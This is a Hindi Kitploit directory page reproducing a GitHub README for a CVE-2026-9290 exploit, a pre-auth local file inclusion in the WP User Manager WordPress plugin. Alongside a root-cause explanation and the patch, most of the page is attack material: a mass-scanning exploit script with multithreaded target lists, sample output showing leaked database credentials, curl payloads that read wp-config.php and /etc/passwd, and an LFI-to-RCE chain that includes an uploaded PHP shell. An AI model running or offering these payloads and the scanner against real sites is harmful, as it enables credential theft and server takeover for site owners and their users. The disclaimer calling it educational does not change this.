Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-9290 — WP User Manager <= 2.9.17 में tab पैरामीटर में path traversal के माध्यम से Pre-auth Local File Inclusion (CVSS 7.5) | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-9290
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshinthink/cve-2026-9290

CVE-2026-9290

WP User Manager <= 2.9.17 में tab पैरामीटर में path traversal के माध्यम से Pre-auth Local File Inclusion (CVSS 7.5)

रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-9290 — WP User Manager LFI से RCE तक एक्सप्लॉइट

'tab' पैरामीटर के माध्यम से Pre-Auth Path Traversal → Local File Inclusion


अवलोकन

CVE-2026-9290 WP User Manager – User Profile Builder & Membership WordPress प्लगइन (≤ 2.9.17) में उच्च-गंभीरता (CVSS 7.5) वाली बिना प्रमाणीकरण वाली Local File Inclusion भेद्यता है।

wpum_get_active_profile_tab() फ़ंक्शन tab क्वेरी पैरामीटर को बिना व्हाइटलिस्ट सत्यापन के सीधे Gamajo टेम्पलेट लोडर को पास करता है। मान में path traversal सीक्वेंस बिना प्रमाणीकरण वाले हमलावरों को PHP के include() के माध्यम से सर्वर से मनमानी फ़ाइलें शामिल करने की अनुमति देते हैं।

tab

प्रभावित संस्करण

WP User Manager संस्करणस्थिति
≤ 2.9.17असुरक्षित
≥ 2.9.18पैच किया गया

भेद्यता तंत्र

मूल कारण

includes/functions.php में, wpum_get_active_profile_tab() फ़ंक्शन बिना व्हाइटलिस्ट सत्यापन के tab क्वेरी पैरामीटर लेता है:

root@kitploit:~
// Vulnerable: no whitelist check on $tab value
$tab = isset($_GET['tab']) ? sanitize_text_field($_GET['tab']) : 'profile';
wpum_get_active_profile_tab($tab);

यह मान Gamajo_Template_Loader::get_template_part() को भेजा जाता है, जो टेम्पलेट फ़ाइल को रिज़ॉल्व करके शामिल करता है:

root@kitploit:~
// class-gamajo-template-loader.php line 226
include($template_path . $tab . '.php');

sanitize_text_field() path traversal सीक्वेंस को नहीं हटाता है। ../../../wp-config वैसे ही पास हो जाता है।

हमले का प्रवाह

root@kitploit:~
GET /profile/?tab=../../../wp-config
  → wpum_get_active_profile_tab('../../../wp-config')
  → Gamajo_Template_Loader::include('../../../wp-config.php')
  → wp-config.php included → DB credentials exposed

प्रमुख फ़ाइलें

फ़ाइलपंक्तिभूमिका
includes/functions.php#L955wpum_get_active_profile_tab() — कोई व्हाइटलिस्ट नहीं
templates/profile.php#L52प्रोफ़ाइल टेम्पलेट स्कोप
class-gamajo-template-loader.php#L226बिना सैनिटाइज़ किया गया include()

पैच (2.9.18)

PR #445 व्हाइटलिस्ट सत्यापन जोड़ता है:

root@kitploit:~
// Patched: check against registered tabs
if (!array_key_exists($tab, $registered_tabs)) {
    $tab = 'profile'; // fallback to default
}

इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-9290.git
cd CVE-2026-9290
pip install -r requirements.txt

उपयोग

root@kitploit:~
# Single target — LFI probe
python cve_2026_9290.py -t target.com

# Mass scan
python cve_2026_9290.py -f targets.txt -v

# Read specific file via LFI
python cve_2026_9290.py -t target.com --read "../../../wp-config.php"

# Save results
python cve_2026_9290.py -f targets.txt -o lfi.txt

तर्क

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  --read PATH       Read a specific file via LFI
  -o, --output      Save results to file
  --threads         Workers (default: 25)
  -v, --verbose     Show detailed output

प्रूफ ऑफ कॉन्सेप्ट (PoC)

पहचान और LFI

root@kitploit:~
$ python cve_2026_9290.py -t target.com -v
root@kitploit:~
  CVE-2026-9290 — WP User Manager LFI → RCE Exploit
  CVSS 7.5 | Pre-Auth | Path Traversal via 'tab' Parameter

    [+] WP User Manager detected
    [+] Profile page: /profile/
    [+] LFI confirmed: wp-config.php (DB credentials)
    [+] Content preview: define('DB_NAME', 'wordpress_db'); define('DB_USER', 'admin');

  Host     : target.com
  WPUM     : YES
  LFI      : YES
  File     : wp-config.php (DB credentials)
  Time     : 3.2s

मास स्कैन

root@kitploit:~
  [LFI]     target-1.com        3.2s  wp-config.php (DB credentials)
            define('DB_NAME', 'wp_db'); define('DB_USER', 'root');
  [LFI]     target-2.com        4.1s  wp-config.php (DB credentials)
            define('DB_NAME', 'site_db'); define('DB_USER', 'admin');
  [200/5458] 3%  |  WPUM:12  LFI:5  |  current-target.com

मैन्युअल एक्सप्लॉइटेशन

चरण 1 — WP User Manager का पता लगाएँ

root@kitploit:~
curl -sk 'https://target.com/wp-content/plugins/wp-user-manager/readme.txt' | head -3

चरण 2 — प्रोफ़ाइल पेज खोजें

root@kitploit:~
curl -sk 'https://target.com/' | grep -oP 'href="[^"]*(?:profile|account|dashboard)[^"]*"'

चरण 3 — tab पैरामीटर के माध्यम से LFI

root@kitploit:~
# Read wp-config.php
curl -sk 'https://target.com/profile/?tab=../../../wp-config'

# Read /etc/passwd  
curl -sk 'https://target.com/profile/?tab=../../../../../../../etc/passwd'

# RCE — include uploaded PHP shell
curl -sk 'https://target.com/profile/?tab=../../../wp-content/uploads/2026/07/shell'

RCE श्रृंखला

root@kitploit:~
1. LFI → read wp-config.php → get DB credentials
2. Upload PHP shell via another plugin/media endpoint
3. LFI → include uploaded shell → RCE

अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए।

यह सॉफ़्टवेयर सुरक्षा पेशेवरों के लिए है जो अधिकृत पेनेट्रेशन परीक्षण करते हैं, उन संगठनों के लिए है जो अपने स्वयं के बुनियादी ढांचे का ऑडिट करते हैं, और उन शोधकर्ताओं के लिए है जो भेद्यता शोषण का अध्ययन करते हैं।

कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है और निम्नलिखित का उल्लंघन कर सकती है:

  • संयुक्त राज्य अमेरिका: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • इंडोनेशिया: UU ITE Pasal 30 & 46
  • यूरोपीय संघ: Directive 2013/40/EU
  • यूनाइटेड किंगडम: Computer Misuse Act 1990

लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं।


संदर्भ

संसाधनलिंक
GitHub एडवाइज़रीGHSA-83v9-496w-54wx
Wordfence एडवाइज़रीwordfence.com
पैच PRGitHub #445
IONIX विश्लेषणionix.io

यह प्रोजेक्ट WP User Manager या Carbon Fields से संबद्ध नहीं है।

टूल डाउनलोड करें